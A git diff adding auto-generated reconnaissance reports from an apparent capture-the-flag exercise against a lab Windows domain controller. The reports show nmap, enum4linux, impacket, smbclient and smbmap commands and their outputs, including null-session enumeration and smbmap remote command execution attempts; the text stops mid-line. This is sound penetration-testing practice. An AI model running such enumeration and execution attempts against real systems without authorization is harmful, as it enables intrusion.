+135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Not Found +9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing +49667/tcp open unknown syn-ack ttl 127 +49673/tcp open unknown syn-ack ttl 127 +49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +49695/tcp open unknown syn-ack ttl 127 +49843/tcp open unknown syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: WAP|phone +Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded +OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz +OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone +TCP/IP fingerprint: +OS:SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%G=N%TM=653CF7B9%P=x86_64-pc-l +OS:inux-gnu)ECN(R=N)T1(R=N)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=N) + +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 59m59s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +| smb2-time: +| date: 2023-10-28T12:59:18 +|_ start_date: N/A + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 ... 30 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:59:53 2023 -- 1 IP address (1 host up) scanned in 887.79 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md new file mode 100644 index 00000000..3de2cdcc --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md @@ -0,0 +1,51 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.093s latency). +Scanned at 2023-10-28 13:45:07 CEST for 1811s +Not shown: 98 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response ttl 127 +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +123/udp open ntp? script-set +| ntp-info: +|_ receive time stamp: 2023-10-28T12:52:08 +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CF493%P=x86_64-pc-linux-gnu%r(DNS +SF:-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_udp\x0 +SF:5local\0\0\x0c\0\x01")%r(Citrix,1E,"\x1e\0\x81\x01\x02\xfd\xa8\xe3\0\0\ +SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=10%DC=T%G=N%TM=653CFB56%P=x86_64-pc-linux-gnu) +SEQ(II=I) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 10 hops + +Host script results: +|_clock-skew: 1h00m07s + +TRACEROUTE (using port 53/udp) +HOP RTT ADDRESS +1 36.79 ms 10.10.14.1 +2 ... 9 +10 35.90 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:15:18 2023 -- 1 IP address (1 host up) scanned in 1812.34 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md new file mode 100644 index 00000000..5dd272d2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md @@ -0,0 +1,81 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Increasing send delay for 10.129.243.131 from 0 to 5 due to 11 out of 20 dropped probes since last increase. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.14s latency). +Scanned at 2023-10-28 13:45:20 CEST for 264s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:47:30Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: specialized +Running (JUST GUESSING): AVtech embedded (87%) +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%) +No exact OS matches for host (test conditions non-ideal). +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CF558%P=x86_64-pc-linux-gnu) +SEQ(SP=103%GCD=1%ISR=109%TI=RD%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) +IE(R=N) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=258 (Good luck!) +IP ID Sequence Generation: Randomized +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 59m57s +| smb2-time: +| date: 2023-10-28T12:49:11 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 135/tcp) +HOP RTT ADDRESS +1 191.57 ms 10.10.14.1 +2 183.81 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:44 2023 -- 1 IP address (1 host up) scanned in 278.93 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md new file mode 100644 index 00000000..de4e959f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +135/tcp filtered msrpc no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.66 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md new file mode 100644 index 00000000..acaf919b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md @@ -0,0 +1,15 @@ +```bash +impacket-getArch -target 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Gathering OS architecture for 1 machines +[*] Socket connect timeout set to 2 secs +[-] 10.129.243.131: Could not connect: timed out + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md new file mode 100644 index 00000000..88f7b518 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md @@ -0,0 +1,15 @@ +```bash +impacket-rpcdump -port 135 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +[-] Protocol failed: Could not connect: timed out +[*] No endpoints found. + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md new file mode 100644 index 00000000..fd69450e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md @@ -0,0 +1,148 @@ +```bash +enum4linux -a -M -l -d 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt): + +``` +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 13:49:45 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. + + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 13:50:18 2023 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md new file mode 100644 index 00000000..24602ad0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +139/tcp filtered netbios-ssn no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.71 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md new file mode 100644 index 00000000..9a48faf8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md @@ -0,0 +1,11 @@ +```bash +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt): + +``` +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_IO_TIMEOUT) + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md new file mode 100644 index 00000000..75ac190d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md @@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md new file mode 100644 index 00000000..40db1a61 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md @@ -0,0 +1,12 @@ +```bash +nbtscan -rvh 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt): + +``` +Doing NBT name scan for addresses from 10.129.243.131 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md new file mode 100644 index 00000000..62c0a399 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +3268/tcp filtered globalcatLDAP no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.69 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md new file mode 100644 index 00000000..99012d28 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 389 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +389/tcp filtered ldap no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results 